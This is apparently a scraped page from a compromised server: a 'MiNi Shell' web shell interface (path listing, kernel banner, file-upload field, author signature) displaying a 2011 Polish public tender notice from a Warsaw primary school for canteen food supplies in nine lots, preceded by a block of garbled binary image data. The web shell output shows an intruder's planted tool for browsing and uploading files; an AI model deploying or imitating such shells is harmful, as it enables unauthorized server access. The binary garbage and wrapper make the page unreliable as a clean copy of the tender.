JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111128/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111128/400670-N-2011.html

<p class="kh_header"><b>Warszawa: Dostawa artykułów spożywczych do stołówki szkolnej z podziałem na 9 pakietów.</b><br>
<b>Numer ogłoszenia: 400670 - 2011; data zamieszczenia: 28.11.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Szkoła Podstawowa Nr 34 im. Stanisława Dubois , ul. Kruczkowskiego 12b, 00-380 Warszawa, woj. mazowieckie, tel. 22 827 87 25, faks 22 827 87 25.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.sp34.neostrada.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: samorządowa jednostka organizacyjna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa artykułów spożywczych do stołówki szkolnej z podziałem na 9 pakietów..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Dostawa artykułów spożywczych do stołówki szkolnej z podziałem na 9 pakietów: 1) PIECZYWO; 2) NABIAŁ; 3) WARZYWA, OWOCE, JAJKA; 4) MIĘSO, WĘDLINY; 5) ARTYKUŁY SPOŻYWCZE; 6) MROŻONKI; 7) RYBY; 8) PRZYPRAWY; 9) GARMAŻERKA ŚWIEŻA- w asortymencie i w ilościach określonych w ofercie - formularz ogólny.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.81.00.00-9, 15.50.00.00-3, 15.30.00.00-1, 03.20.00.00-3, 03.10.00.00-2, 03.14.25.00-3, 15.10.00.00-9, 15.00.00.00-8, 15.20.00.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>o	Na potwierdzenie spełnienia tego warunku Zamawiający żąda od wykonawcy oświadczenia w formie załącznika nr 2, tj. oświadczenie o spełnieniu wymagań zawartych w art. 22 ust. 1 Ustawy z dnia 29 stycznia 2004r. Prawo zamówień publicznych (t.j. Dz. U. nr 113 z 2010r. poz. nr 759 z późn. zmian.). Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana w oparciu o złożone oświadczenie metodą spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>o	Na potwierdzenie spełnienia tego warunku Zamawiający żąda od wykonawcy oświadczenia w formie załącznika nr 2, tj. oświadczenie o spełnieniu wymagań zawartych w art. 22 ust. 1 Ustawy z dnia 29 stycznia 2004r. Prawo zamówień publicznych (t.j. Dz. U. nr 113 z 2010r. poz. nr 759 z późn. zmian.). Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana w oparciu o złożone oświadczenie metodą spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>o	Na potwierdzenie spełnienia tego warunku Zamawiający żąda od wykonawcy oświadczenia w formie załącznika nr 2, tj. oświadczenie o spełnieniu wymagań zawartych w art. 22 ust. 1 Ustawy z dnia 29 stycznia 2004r. Prawo zamówień publicznych (t.j. Dz. U. nr 113 z 2010r. poz. nr 759 z późn. zmian.). Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana w oparciu o złożone oświadczenie metodą spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>o	Na potwierdzenie spełnienia tego warunku Zamawiający żąda od wykonawcy oświadczenia w formie załącznika nr 2, tj. oświadczenie o spełnieniu wymagań zawartych w art. 22 ust. 1 Ustawy z dnia 29 stycznia 2004r. Prawo zamówień publicznych (t.j. Dz. U. nr 113 z 2010r. poz. nr 759 z późn. zmian.). Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana w oparciu o złożone oświadczenie metodą spełnia/nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.sp34.neostrada.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Szkoła Podstawowa nr 34 im. Stanisława Dubois, ul. Kruczkowskiego 12 b, 00-380 Warszawa.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.12.2011 godzina 10:00, miejsce: Szkoła Podstawowa nr 34 im. Stanisława Dubois, ul. Kruczkowskiego 12 b, 00-380 Warszawa pokój nr 7.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> PIECZYWO.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Chleb biały krojony  - 0,570	szt	1 400,
Pieczywo ciemne 0,5	szt	450,
Chleb razowy ze słonecznikiem  -  0,500g	szt	120,
Bułeczka maślana - 0,050g	szt	1 200,
Bułki wrocławskie długie 0,250g	szt	1 280,
Bułka tarta	kg	120,
Pączki 0,05	szt	750,
Chałka 0,3	szt	230,
Drożdżówka mix z nadzieniem	szt	750,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.11.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> NABIAŁ.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Masło typu ekstra 200g  82%	kg	750,
Śmietana typu Piątnica 400g 18%	op.	1 600,
Jogutr pitny owocowy 500ml typu Milko	szt	1 000,
Jogurt typu Actimel 100g	szt	2 000,
Serki topione  śmietankowe typu Hochland 100g	szt	630,
Ser żółty 45% 90 s.w.s.	kg	170,
Ser żółty typu  liliput 250g	szt	25,
Jogurt naturalny - 370g	szt	230,
Twaróg póltłusty typu garwolin	kg	180,
Twaróg mielony w pojemniczkach 1kg	kg	54,
Mleko  w folii 3,2 %	litr	1 500,
Drożdże 100g	szt	30,
Masło roślinne 250g	szt	260,
Bita śmietana 250ml	but	50,
Deser czekoladow z bitą śmietaną 175g	szt	1 500,
Mleczna kanapka typu King-Maxi 35g	szt	1 000,
Serek waniliowy typu Danio 140g	szt	1100,
Serek typu Almette śmietankowy 150g	szt	120.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.53.00.00-2, 15.51.11.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> WARZYWA,OWOCE, JAJKA.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Cebula	kg	260,
Jabłka	kg	1 300,
Kapusta biała 	kg	260,
Kapusta czerwona	kg	120,
Kapusta kiszona	kg	260,
Kapusta pekińska	szt.	220,
Marchew świeza	kg	300,
Ogórki kiszone	kg	230,
Ogórki konserwowe  a 1 litr	szt.	100,
Ogórki świeże	kg	600,
Papryka świeża czerwona	kg	250,
Pieczarki	kg	300,
Pietruszka korzeń	kg	40,
Pomidory świeże	kg	240,
Selery	kg	120,
Fasolka szparagowa	kg	100,
Kalafior	szt.	350,
Ziemniaki	kg	7 000,
Jaja kurze średnie I gatunek	szt.	4 200,
Banany	kg	900,
Por	kg	210,
Szczypior	pęcz	300,
Koper	pęcz	380,
Buraki	kg	280,
Cytryny	kg	40,
Kiwi	kg	1 000,
Żurawina 1kg	pacz	10,
Gruszka	kg	500,
Winogrona białe	kg	30,
Nektaryki	kg	400,
Groch luskany	kg	60,
Pietruszka natka	pęcz	700,
Mandaryki	kg	500,
Śliwka węgierka 	kg	30,
Pomarańcze	kg	500,
Truskawka świeża	kg	25,
Rzodkiewka	pęcz	250,
Botwinka	pęcz	60,
Rabarbar	kg	30,
Brzoskwinia świeża	kg	400,
Ananas plastry 550g	pusz	120,
Arbuz	kg	100,
Brukselka 	kg	40,
Kapusta młoda	szt.	100,
Brokuły świeże	szt.	300,
Brzoskwinie połówki w zalewie 850g	pusz	120,
Chrzan tarty 0,27	słoik	80,
Cykoria	kg	30,
Groch łuskany    	kg	60,
Groszek konserwowy 400g	pusz	60,
Kapusta włoska	kg	400,
Ketchup 400g	but	40,
Kukurydza  - 170g	pusz	190,
Majonez typu Winiary Omega 3:6  400g	słoik	270,
Miód - 0,5l wielokwiatowy	słoik	30,
Musztarda 200g	słoik	45,
Sałata 	szt.	180,
Sałata lodowa	szt.	270,
Sezam 150g	pacz	50,
Barszcz biały 1litr	but	130,
Wiśnie	kg	40,
Fasola czerwona 400g	pusz	60,
Rzodkiew biała	kg	80,
Sok malinowy 1litr	but	90,
Włoszczyzna	pęcz	1 100,
Czosnek świeży wianki	szt.	20,
Fasola sucha 	kg	50,
Soczki owocowe w kartonach 0,2	szt.	750,
Szczaw konserwowy 200g	słoik	180,
Dymka	pęcz	200,
Ogórki konserwowe w pusz 3kg	puszka	20.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> MIĘSO, WĘDLINY.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Schab karkowy b/k świeży	kg	220,
Schab środkowy b/k  świeży	kg	480,
Piersi z kurczaka świeże	kg	480,
Łopatka b/k świeża	kg	66,
Szynka wieprzowa b/k exstra porcje  świeża	kg	520,
Szponder wołwy  świeży	kg	190,
Korpusy kurczka  świeże	kg	150,
Wołowe b/k  świeże	kg	200,
Pręga b/k  świeża	kg	80,
Słonina  świeża	kg	110,
Łata wołowa b/k  świeża	kg	100,
Filet z indyka  świeży	kg	480,
Skrzydło indycze  świeże	kg	100,
Żeberka paski  świeże	kg	250,
Kurczak cały  świeży	kg	400,
Mięso mielone z szynki wiep.  Świeże	kg	240,
Mięso mielone z indyka  świeże	kg	240,
Udka kulinarne  świeże	kg	310,
Udka ćwiartki  świeże	kg	410,
Krakowska podsuszana  	kg	24,
Krakowska parzona	kg	24,
Polędwica sopocka	kg	23,
Polędwica miodowa	kg	23,
Szynka gotowana	kg	22,
Baleron	kg	23,
Szynka bez konserwantów	kg	10,
Szynkowa	kg	24,
Parówki odłuszczone	kg	20,
Mielonka	kg	24,
Szynka konserwowa	kg	20,
Kiełbasa śląska	kg	132.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.11.11.00-0, 15.11.10.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Artykuły spożywcze.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Budyń czekoladowy 60g	szt	300,
Budyń śmietankowy 60g	szt	360,
Cukier 	kg	800,
Cukier puder 0,4kg	szt	10,
Cukier waniliowy 16g	szt	60,
Dżem leśny 280g	słoik	60,
 Dżem truskawkowy 280g	słoik	60,
Galaretka cytrynowa 79g	szt	200,
Galaretka truskawkowa 79g	szt	400,
Hergata Tettley Earl g.100t	szt	20,
Herbata mieta 20t	szt	30,
Herbata owocowa 20t	szt	30,
Kakao rozpuszcalne Puchatek	szt	80,
Kawa inka 150g	szt	50,
Kasza gryczana saszetki 4x100	szt	240,
Kasza jęczmienna saszetki 4x100 	szt	140,
Kasza manna kg	kg	10,
Sos słodko -kwaśny 0,5	słoik	135,
Kisiel truskawkowy 77g	szt	150,
Kisiel malinowy 77g	szt	150,
Kisiel żurawinowy 77g	szt	150,
Koncentrat buraczany 300ml.	but	40,
Koncentrat pomidorowy 1kg	słoik	170,
Płatki ryżowe 400g	szt	40,
Kwasek cytrynowy 20g	szt	180,
Makaron kokartki typu Lubelle 400g	szt	90,
Makaron kokartki małe typu Lubella 400g	szt	35,
Makaron kolanka typu Lubella 500g	szt	35,
Makaron muszelki mała typu Lubella 400g	szt	70,
Makaron rurki typu Lubella 400g	szt	160,
Makaron nitki typu Lubella 500g	szt	90,
Makaron spagetti typu Lubella 500g	szt	143,
Makaron świderki typu Lubella 500g	szt	160,
Makaron wstążka typu Lubella 500g	szt	90,
Makaron zacierki 250g	szt	120,
Maka szymanowska kg	kg	650,
Mąka ziemniaczana kg	kg	20,
Krem czekoladowy typu Nutella 350g	słoik	44,
Olej typu kujawski litr	litr	700,
Płatki typu cheerios 225g	szt	80,
Płatki typu nesguik 225g	szt	80,
Płatki typu gold flakes 250g	szt	80,
Płatki kukurydziane typu Lubella 500g	szt	44,
Proszek do pieczenia 18g	szt	50,
Ryż typu Sonto 1kg	kg	190,
Sól jodowana 1kg	kg	190,
Rodzynki 200g	szt	60,
Wafle ryżowe 130g	szt	80,
Sok typu Kubuś 400ml owocowy	szt	1 000,
Ciastka typu misie lubisie szkolne 30g	szt	1 250,
Ciastka typu Vobro  maślane 150g	szt	1000,
Ciastka markizy karton 3,8kg	kart	3,
Ciastka typu herbatniki Zoo  karton 2kg	kart	5,
Ciastka wafelki karton 2,8kg	kart	3,
Wafelek typu Prince Polo  52g	szt	1 000,
Musli typu Sante tropical 350g	szt	24,
Musli typu Sante fruit 350g	szt	24,
Herbatniki typu Petitki z mlecznym nadzieniem 112g	szt	750,
Baton typu Kinder Pingui Cocca 30g	szt	750,
Jajko niespodzianka typu fer Kinder 	szt	1 000,
Zajączek czekoladowy 170 g	szt	245,
Mikołaj czekoladowy 170 g	szt	245,
Pasztet drobiowy 155 g	puszka	128.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.83.10.00-2, 15.86.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Mrożonki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Mieszanka kompotowa  (truskawka,wiśnia,śliwka) 2,5kg	torebka	50,
Śliwka bez pestek  - 2,5kg	torebka	10,
Porzeczka czarna  - 2,5kg	torebka	20,
Truskawka  - 2,5kg	torebka	100,
Wiśnia bez pestek -  2,5kg	torebka	30,
Fasolka szparagowa żółta - kg	kg	100,
Fasolka zielona - kg	kg	80,
Marchew z groszkiem -kg	kg	80,
Marchew -kg	kg	100,
Kalafior - 450g	torebka	84,
zupa jarzynowa 2,5kg	torebka	12,
Brokuły- 450g	torebka	72,
Barszcz ukraiński  - 450g	torebka	120.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.33.21.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> RYBY.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Filet mintaj shp 4/6 USA/Rosja-extra	kg	300,
Filet morszczuk shp	kg	120,
Tuńczyk w sosie własnym 170g	puszka	60,
Szprotki w pomidorach 170g	puszka	60,
Makrela wędzona	kg	30.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.22.10.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Przyprawy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Majeranek 8g x 15szt	karton	20,
Czosnek granulowany 20g x 25szt	karton	20,
Oregano  10g x 20szt	karton	2,
Zioła prowansalskie 10g x 20szt	karton	3,
Papryka słodka 20g x 25szt	karton	3,
Pieprz mielony czarny 20g x 25szt	karton	10,
Ziele angielskie 15g x 20szt	karton	1,
Przyprawa do ryb 25g x 25 szt.	karton	1,
Sos pieczeniowy 30g x 35szt	karton	15,
Liść laurowy 6g x 15szt	karton	1,
Przyprawa do mięsa 25g x 18szt	karton	10,
Przyprawa do drobiu 25g x 28szt	karton	10,
Kostki rosołowa 120g x 16szt	karton	10.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.87.23.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Garmażerka świeża.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pierogi z serem świeże pakowane 1kg	kg	440,
Kluski śląskie świeże pakowane 1 kg	kg	440,
Kluski leniwe świeże pakowane 1kg	kg	440,
Kopytka świeże pakowane 1 kg	kg	495.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.89.43.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com